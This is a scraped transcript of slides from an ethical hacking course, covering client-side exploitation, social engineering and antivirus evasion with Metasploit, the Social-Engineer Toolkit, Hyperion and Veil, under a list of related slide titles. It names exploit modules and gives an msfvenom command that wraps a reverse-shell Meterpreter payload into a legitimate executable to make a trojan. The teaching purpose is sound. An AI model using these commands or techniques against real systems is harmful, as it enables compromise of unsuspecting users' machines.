CNIT 124: Advanced Ethical Hacking Ch 10: Client-Side Exploitation.

Slides:



Advertisements
Similar presentations
By Hiranmayi Pai Neeraj Jain
Advertisements

1 Chapter 8 Fundamentals of System Security. 2 Objectives In this chapter, you will: Understand the trade-offs among security, performance, and ease of.
WebGoat & WebScarab “What is computer security for $1000 Alex?”
For Removal Info: visit
Information Security 1 Information Security: Demo of Some Security Tools Jeffy Mwakalinga.
1 The Information School of the University of Washington Nov 17fit spyware © 2006 University of Washington The Dark Side of the Internet INFO/CSE.
Security Awareness: Applying Practical Security in Your World Chapter 6: Total Security.
Browser Exploitation Framework (BeEF) Lab
Course 201 – Administration, Content Inspection and SSL VPN
Basic Computer Security Sankardas Roy Department of Computing and Information Sciences Kansas State University.
© 2007 NeoAccel, Inc. NeoAccel SGX Installation Guide Dear Customer: We are pleased to provide you with our training presentation for our SSL VPN-Plus.
Securing Windows 7 Lesson 10. Objectives Understand authentication and authorization Configure password policies Secure Windows 7 using the Action Center.
1 Infrastructure Hardening. 2 Objectives Why hardening infrastructure is important? Hardening Operating Systems, Network and Applications.
Outline  Infections  1) r57 shell  2) rogue software  What Can We Do?  1) Seccheck  2) Virus total  3) Sandbox  Prevention  1) Personal Software.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Basic Security Networking for Home and Small Businesses – Chapter 8.
Detrick Robinson & Amris Treadwell.  Computer viruses- are pieces of programs that are purposely made up to infect your computer.  Examples: › Internet.
Malicious Code Brian E. Brzezicki. Malicious Code (from Chapter 13 and 11)
Copyright ®xSpring Pte Ltd, All rights reserved Versions DateVersionDescriptionAuthor May First version. Modified from Enterprise edition.NBL.
MIS Week 2 Site:
Windows Vista Security Center Chapter 5(WV): Protecting Your Computer 9/17/20151Instructor: Shilpa Phanse.
STAR CBT Tryout Setting Up Your Computer Systems for the STAR CBT Tryout for Technical Coordinators J.
COMPREHENSIVE Windows Tutorial 5 Protecting Your Computer.
Malicious Attack Corporate Awareness and Walk through Date 29 September 2011.
Common Cyber Defenses Tom Chothia Computer Security, Lecture 18.
Troubleshooting Windows Vista Security Chapter 4.
Zscaler New Interface and Reporting From Saturday 8 th June 2013.
1 Internet Browsing Vulnerabilities and Security ECE4112 Final Lab Ye Yan Frank Park Scott Kim Neil Joshi.
September 2015 LCCU Meeting How can you manage the Adobe Flash security risk? How can you keep Flash and other software updated? We’ll answers members’
1 CHAPTER 2 LAWS OF SECURITY. 2 What Are the Laws of Security Client side security doesn’t work Client side security doesn’t work You can’t exchange encryption.
Client-based Application Attacks Adli Abdul Wahid Dept. of Comp. Science, IIUM
CSE 4481 Computer Security Lab Mark Shtern. INTRODUCTION.
Android Security Auditing Slides and projects at samsclass.info.
October 3, 2008IMI Security Symposium Application Security through a Hacker’s Eyes James Walden Northern Kentucky University
Understanding Computer Viruses: What They Can Do, Why People Write Them and How to Defend Against Them Computer Hardware and Software Maintenance.
Module 7: Advanced Application and Web Filtering.
Hacking Windows 9X/ME. Hacking framework Initial access physical access brute force trojans Privilege escalation Administrator, root privileges Consolidation.
CNIT 124: Advanced Ethical Hacking Ch 7: Capturing Traffic.
Ethical Hacking: Hacking GMail. Teaching Hacking.
Vulnerability Scanning Vulnerability scanners are automated tools that scan hosts and networks for known vulnerabilities and weaknesses Credentialed vs.
TCOM Information Assurance Management System Hacking.
Stealing Passwords Remotely & Malware Analysis PacITPros May 8, 2012.
Retina Network Security Scanner
Chapter 12: How Private are Web Interactions?. Why we care? How much of your personal info was released to the Internet each time you view a Web page?
NetTech Solutions Protecting the Computer Lesson 10.
CNIT 124: Advanced Ethical Hacking Ch 13: Post Exploitation Part 2.
Firewalls Fighting Spyware, Viruses, and Malware Ch 5.
Role Of Network IDS in Network Perimeter Defense.
Mark Shtern.  Our life depends on computer systems  Traffic control  Banking  Medical equipment  Internet  Social networks  Growing number of.
MIS Week 5 Site:
Vulnerabilities in Operating Systems Michael Gaydeski COSC December 2008.
Securing a Host Computer BY STEPHEN GOSNER. Definition of a Host  Host  In networking, a host is any device that has an IP address.  Hosts include.
How to fix Error code 0x80072ee2 in Windows 8.1? Fix%20%20Update%20Error%200x80072EE2%20in%20Windows%20 8.1,%20Windows%2010!%20-%20Fix%20PC%20Errors.htm.
Unit 2 Personal Cyber Security and Social Engineering Part 2.
Remove [Browser Hijackers] For more information regarding [Browser Hijackers] Please Visit:
Information Systems Design and Development Security Precautions Computing Science.
Proctor Caching Overview. 2 Proctor Caching Diagram.
Chapter 14.  Upon completion of this chapter, you should be able to:  Identify different types of Intrusion Detection Systems and Prevention Systems.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Windows Tutorial 5 Protecting Your Computer
Penetration Testing Exploiting 2: Compromising Target by Metasploit tool CIS 6395, Incident Response Technologies Fall 2016, Dr. Cliff Zou
Intro to Ethical Hacking
Penetration Testing Social Engineering Attack and Web-based Exploitation CIS 6395, Incident Response Technologies Fall.
Bypassing Antivirus API
Working at a Small-to-Medium Business or ISP – Chapter 8
CIT 480: Securing Computer Systems
Intro to Ethical Hacking
Backtrack Metasploit and SET
Web Application Penetration Testing ‘17
Cyber Operation and Penetration Testing Social Engineering Attack and Web-based Exploitation Cliff Zou University of Central Florida.
Network hardening Chapter 14.
Presentation transcript:

CNIT 124: Advanced Ethical Hacking Ch 10: Client-Side Exploitation

Low-Hanging Fruit The weakest defenders have these sorts of problems – Vulnerable services listening on network ports – Unchanged default passwords – Misconfigured web servers

Defenses Install all security patches Audit passwords and remove easily-guessed or –cracked ones Control user roles – Regular users don't have administrative rights on their workstations – Software is installed and maintained by the security staff

Other Attacks That don't require direct network access Target local software—not listening on a network port Payloads – Bind shell won't work, because such systems are behind firewalls – Reverse connections may work

Topics Bypassing Filters with Metasploit Payloads Client-Side Attacks – Browser Exploitation – Running Scripts in a Meterpreter Session – PDF Exploits – Java Exploits – browser_autopwn

Bypassing Filters with Metasploit Payloads

All Ports Filters may not allow an outgoing connection to port 4444 (Metasploit's reverse_tcp default) – But it may allow connections to ports 80 or 443 reverse_tcp_allports payload will try all ports – First it tries LPORT, then all other ports – May cause target application to hang for a long time

HTTP and HTTPS Payloads Traffic follows HTTP and HTTPS specifications Packet-based, not stream-based like TCP payloads Interrupted sessions can recover and reconnect

Proxy Servers HTTP and HTTPS payloads use the Internet Explorer proxy settings – May fail when running as SYSTEM because those proxy settings are not defined reverse_http_proxy payload allows the attacker to manually specify proxy settings

Client-Side Attacks

Local Attacks Attacking Web browsers, document viewers, music players, etc. – Create malicious file – Trick user into opening it on the target system – Then the machine makes a connection back to the attacker Such attacks are more important in penetration tests – Because more companies are finding and fixing network-listening vulnerabilities

Attacking Through NAT Workstations and mobile devices typically lack a public IP address – They cannot be directly attacked – But they can still make outgoing connections to the attacker (reverse) – BUT it all relies on social engineering – Target must open a file, or click a link

Browser Exploitation

Malicious Web Page Get user to visit a malicious Web page Hijack execution in the browser and execute a payload

Aurora Attack Chinese hackers used it against Google, Adobe, and Yahoo! A zero-day IE vulnerability – After this attack, Google switched to Chrome Metasploit module – exploit/windows/browser/ms10_002_aurora

Running Scripts in a Meterpreter Session

Normal IE Attack Start a malicious Web server

Open the Malicious Page

Own the Target

Meterpreter Lives in a Process Terminating this process kills the Meterpreter session

Migrate Script

AutoRunScript

Explorer.exe Draws the desktop and the Start button Runs until the user logs out

PDF Exploits

Adobe Reader Vulns Not as many as there used to be – Link Ch 10a

Adobe PDF Embedded EXE Social Engineering Not considered a coding error to be patched A feature of Adobe Reader that can be abused exploit/windows/fileformat/adobe_pdf_embe dded_exe Does not work on Adobe Reader 8.12 on Windows Server 2008 Does not work in Adobe Reader DC on Win 7

Vulnerable Form Link Ch 10b

Warning Message

Java Exploits

Multiplatform Java is very popular because the same code can be run in a Java Virtual Machine on any platform – Windows, Mac, Linux, Android Therefore exploitation is also multiplatform Must trick user into opening a malicious URL

Warning Message

Nothing Very Recent

browser_autopwn

Start All The Modules

20 Modules

Results IE 11 on Win 7: FAILS because I don't have Java installed Firefox 41.0 on Win7 FAILS Chrome on Win 7 FAILS

IE 7 on Win Server 2008

IE 7 on Win Server 2008 FAILS

CNIT 124: Advanced Ethical Hacking Ch 11: Social Engineering

Spear-Phishing Attacks

Many Attack Options

Gmail Blocks It Default Metasploit payloads are blocked by virus scanners

Web Attacks

Web Attack Options

Attack Explanations Metasploit Browser is like browser_autopwn Credential Harvester makes fake login pages Tabnapping says "Please Wait" and when the user clicks on another tab, changes to a fake login page

Broken in Kali 2 The update option is broken You can force an update (link Ch 11a) But even then, Credential Harvester is broken – Because it uses /var/www instead of /var/www/html

CNIT 124: Advanced Ethical Hacking Ch 12: Bypassing Antivirus Applications

Trojans Add malware to existing executables with msfvenom Only works with files that don't check integrity with hash values or signatures msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=2345 -x /root/Desktop/notepad++.exe -k -f exe > evilnotepad++.exe

AV This trojan works on Win 7, but many AV products catch it

Encoding Metasploit includes encoding engines, like shikata_ga_nai, but the AV vendors are on to them and they actually make the trojan more detectable

Cross-Compiling You can export the malware as C code and compile it, adding a random value – Still, almost as many AV vendors catch it Exporting malware as Python and then compiling it on Windows to an EXE worked well for me a couple of years ago – Clumsy process, produces large EXE files

Encrypting with Hyperion Hyperion encrypts the file with AES, and with a key drawn from a small portion of the possible keyspace Then deletes the key When run, it brute-forces the key This fooled Microsoft Security Essentials, but not many other AV engines

Veil-Evasion Big, powerful program Takes a while to install on Kali Results are not impressive